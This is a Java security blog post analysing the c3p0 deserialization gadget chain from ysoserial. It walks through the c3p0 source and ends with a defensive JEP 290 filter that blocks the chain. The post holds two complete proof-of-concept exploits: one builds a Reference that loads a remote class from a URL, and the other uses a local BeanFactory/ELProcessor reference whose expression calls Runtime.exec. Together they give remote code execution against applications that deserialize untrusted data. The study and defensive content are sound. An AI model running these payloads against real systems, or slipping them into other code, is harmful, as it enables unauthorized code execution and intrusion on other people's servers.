[Java Security] Deserialization: analysis of the c3p0 class-loading POP chain, ysoserial C3P0 PoC analysis, and class-loading RCE via c3p0 without outbound network access

Preface

Pull in the required dependencies at the same versions ysoserial uses:

        <!-- https://mvnrepository.com/artifact/com.mchange/c3p0 -->
        <dependency>
            <groupId>com.mchange</groupId>
            <artifactId>c3p0</artifactId>
            <version>0.9.5.2</version>
        </dependency>

        <!-- https://mvnrepository.com/artifact/com.mchange/mchange-commons-java -->
        <dependency>
            <groupId>com.mchange</groupId>
            <artifactId>mchange-commons-java</artifactId>
            <version>0.2.11</version>
        </dependency>

Reproduction code

Utility classes

Reflection-based getter/setter:
ReflectPacked/ValueGetterSetter.java

package ReflectPacked;

import java.lang.reflect.Field;

// Reflection helpers for reading and writing private fields, so the PoC can set
// a field declared on a superclass (PoolBackedDataSourceBase) of the object it holds.
public class ValueGetterSetter {
    // Set a field declared on methodInClass (which may be a superclass of targetObj's class).
    public static void setValue(Class<?> methodInClass, Object targetObj, String name, Object value) throws Exception {
        Field field = methodInClass.getDeclaredField(name);
        field.setAccessible(true);
        field.set(targetObj, value);
    }

    // Convenience overload: look the field up on the object's own class.
    public static void setValue(Object targetObj, String name, Object value) throws Exception {
        setValue(targetObj.getClass(), targetObj, name, value);
    }

    // Read a field declared on methodInClass from targetObj.
    public static Object getValue(Class<?> methodInClass, Object targetObj, String name) throws Exception {
        Field field = methodInClass.getDeclaredField(name);
        field.setAccessible(true);
        return field.get(targetObj);
    }

    // Convenience overload: look the field up on the object's own class.
    public static Object getValue(Object targetObj, String name) throws Exception {
        return getValue(targetObj.getClass(), targetObj, name);
    }
}


Deserialization helper:

UnserializePacked.Unserialize.java

package UnserializePacked;

import java.io.*;

// Round-trips an object through Java serialization: write it to a temporary file,
// then read it back with a plain, unfiltered ObjectInputStream so that the
// target class's readObject() runs.
public class Unserialize {
    public static void unserialize(Object obj) throws Exception {
        File f = File.createTempFile("temp", "out");

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
        oos.writeObject(obj);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
        Object o = ois.readObject();
        System.out.println(o);
        ois.close();

        f.deleteOnExit();
    }
}

PoC

package c3p0;

import ReflectPacked.ValueGetterSetter;
import UnserializePacked.Unserialize;

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

public class PoC {
    public static void main(String[] args) throws Exception {
        String url = "http://127.0.0.1/";
        PoolBackedDataSource source = new PoolBackedDataSource();
        ValueGetterSetter.setValue(PoolBackedDataSourceBase.class, source, "connectionPoolDataSource", new PoolSource("Exploit", url));
        Unserialize.unserialize(source);
    }

    private static class PoolSource implements ConnectionPoolDataSource, Referenceable{
        private String className;
        private String url;

        public PoolSource (String className, String url) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference() throws NamingException {
            return new Reference(this.className, this.className, this.url);
        }

        public PooledConnection getPooledConnection() throws SQLException {
            return null;
        }

        public PooledConnection getPooledConnection(String user, String password) throws SQLException {
            return null;
        }

        public PrintWriter getLogWriter() throws SQLException {
            return null;
        }

        public void setLogWriter(PrintWriter out) throws SQLException {

        }

        public void setLoginTimeout(int seconds) throws SQLException {

        }

        public int getLoginTimeout() throws SQLException {
            return 0;
        }

        public Logger getParentLogger() throws SQLFeatureNotSupportedException {
            return null;
        }
    }
}


Code audit | How it works

1. ReferenceSerialized.getObject() triggers class loading

ReferenceSerialized is a private inner class of ReferenceIndirector; its constructor takes four parameters and it implements the IndirectlySerialized interface.

As long as contextName is null, class loading is triggered, and the class recorded in the Reference is loaded.

It can load either a remote class or a local class, which is why there is also a way to exploit this without outbound network access.

2. ReferenceIndirector.indirectForm() creates the ReferenceSerialized instance

As analyzed above, ReferenceSerialized is a private inner class, and it is created only through ReferenceIndirector.indirectForm().

ReferenceIndirector's constructor is empty, so all three of its attributes have to be supplied through setters.

indirectForm() creates the ReferenceSerialized instance: pass in an object that implements the Referenceable interface, and it obtains a Reference from that object and uses it to build the ReferenceSerialized.

Therefore, to pass in a Reference you have to hand-write a class that implements Referenceable; placing a class whose static initializer performs the RCE on a server then triggers remote class loading.

3. Deserializing PoolBackedDataSourceBase triggers IndirectlySerialized.getObject()

readObject() calls IndirectlySerialized.getObject().

The object o is read from the deserialized stream; to see how o ends up there, we have to look at the logic of writeObject().

4. PoolBackedDataSourceBase.writeObject() serializes the IndirectlySerialized object

Inside writeObject(), the second try block inside the first catch block is what produces the IndirectlySerialized object.

It passes in this.connectionPoolDataSource, which is an object implementing the ConnectionPoolDataSource interface.

That object must also implement the Referenceable interface, and execution must reach the catch block.

Reaching the catch block means the first try block has to throw: the first try block serializes this.connectionPoolDataSource, so as long as that object does not implement Serializable, it throws.

In summary, we need to hand-write a class that implements the two interfaces above, does not implement Serializable, and whose getReference() returns a malicious Reference, as shown below.

POP chain

<clinit>:6, Exploit
forName0:-1, Class (java.lang)
forName:348, Class (java.lang)
referenceToObject:91, ReferenceableUtils (com.mchange.v2.naming)
getObject:118, ReferenceIndirector$ReferenceSerialized (com.mchange.v2.naming)
readObject:211, PoolBackedDataSourceBase (com.mchange.v2.c3p0.impl)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1909, ObjectInputStream (java.io)
readOrdinaryObject:1808, ObjectInputStream (java.io)
readObject0:1353, ObjectInputStream (java.io)
readObject:373, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:23, PoC (c3p0)

※ Exploiting c3p0 without outbound network access

Note that the class loading is performed by ReferenceableUtils.referenceToObject(), which supports both a local factory class and class loading from a remote URL.

So BeanFactory can be used for local class loading without outbound network access, in the same way as bypassing the JNDI injection restrictions of newer JDK versions:

[Java Security] Studying how to bypass the restrictions of newer JDK versions to perform JNDI injection

package c3p0;

import ReflectPacked.ValueGetterSetter;
import UnserializePacked.Unserialize;

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

public class LocalPoC {
    public static void main(String[] args) throws Exception {

        PoolBackedDataSource source = new PoolBackedDataSource();
        ValueGetterSetter.setValue(PoolBackedDataSourceBase.class, source, "connectionPoolDataSource", new PoolSource());
        Unserialize.unserialize(source);
    }

    private static class PoolSource implements ConnectionPoolDataSource, Referenceable{
        public PoolSource () {
        }

        public Reference getReference() throws NamingException {
            ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
            resourceRef.add(new StringRefAddr("forceString", "a=eval"));
            resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));
            return resourceRef;
        }

        public PooledConnection getPooledConnection() throws SQLException {
            return null;
        }

        public PooledConnection getPooledConnection(String user, String password) throws SQLException {
            return null;
        }

        public PrintWriter getLogWriter() throws SQLException {
            return null;
        }

        public void setLogWriter(PrintWriter out) throws SQLException {

        }

        public void setLoginTimeout(int seconds) throws SQLException {

        }

        public int getLoginTimeout() throws SQLException {
            return 0;
        }

        public Logger getParentLogger() throws SQLFeatureNotSupportedException {
            return null;
        }
    }
}
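Both variants above (the remote Reference and the local BeanFactory/ELProcessor ResourceRef) execute entirely inside ObjectInputStream.readObject(), before the caller ever receives an object, so a JEP 290 deserialization filter that refuses the c3p0 and org.apache.naming classes at class-descriptor resolution stops the chain before PoolBackedDataSourceBase.readObject() can run. The following is an added example, not code from this post or from c3p0; it assumes Java 9+ (java.io.ObjectInputFilter) and a hypothetical application allowlist consisting of ArrayList and String.

```java
import java.io.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

public class FilteredUnserialize {
    // Hypothetical allowlist: only the types this application expects in the stream.
    private static final Set<String> ALLOWED = Set.of("java.util.ArrayList", "java.lang.String");
    // Packages the chain on this page lives in: c3p0 (PoolBackedDataSourceBase,
    // ReferenceIndirector$ReferenceSerialized) and Tomcat naming (ResourceRef/BeanFactory).
    private static final List<String> DENIED = List.of("com.mchange.", "org.apache.naming.");

    static ObjectInputFilter.Status check(ObjectInputFilter.FilterInfo info) {
        // Structural limits; the c3p0 graph is shallow, but cap depth and reference count anyway.
        if (info.depth() > 8 || info.references() > 200) return ObjectInputFilter.Status.REJECTED;
        Class<?> c = info.serialClass();
        if (c == null) return ObjectInputFilter.Status.UNDECIDED; // limit-only callback, no class
        while (c.isArray()) c = c.getComponentType();
        if (c.isPrimitive()) return ObjectInputFilter.Status.ALLOWED;
        String name = c.getName();
        if (DENIED.stream().anyMatch(name::startsWith)) return ObjectInputFilter.Status.REJECTED;
        return ALLOWED.contains(name) ? ObjectInputFilter.Status.ALLOWED
                                      : ObjectInputFilter.Status.REJECTED;
    }

    public static Object unserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            // The filter runs as each class descriptor is resolved, i.e. before
            // PoolBackedDataSourceBase.readObject() could ever reach getObject().
            ois.setObjectInputFilter(FilteredUnserialize::check);
            return ois.readObject();
        }
    }

    private static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: an allowed list round-trips, an unlisted Date is refused.
        System.out.println(unserialize(serialize(new ArrayList<>(List.of("ok")))));
        try {
            unserialize(serialize(new java.util.Date()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

A rejected class surfaces as InvalidClassException with "filter status: REJECTED", which is a useful string to alert on in application logs; the same allow/deny policy can be applied process-wide with the jdk.serialFilter system property instead of per stream.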


Follow my CSDN blog: @Ho1aAs
Copyright: Ho1aAs
Link to this post: https://blog.csdn.net/Xxy605/article/details/123486201
Copyright notice: this is an original post; when reposting, cite the source and include this notice.
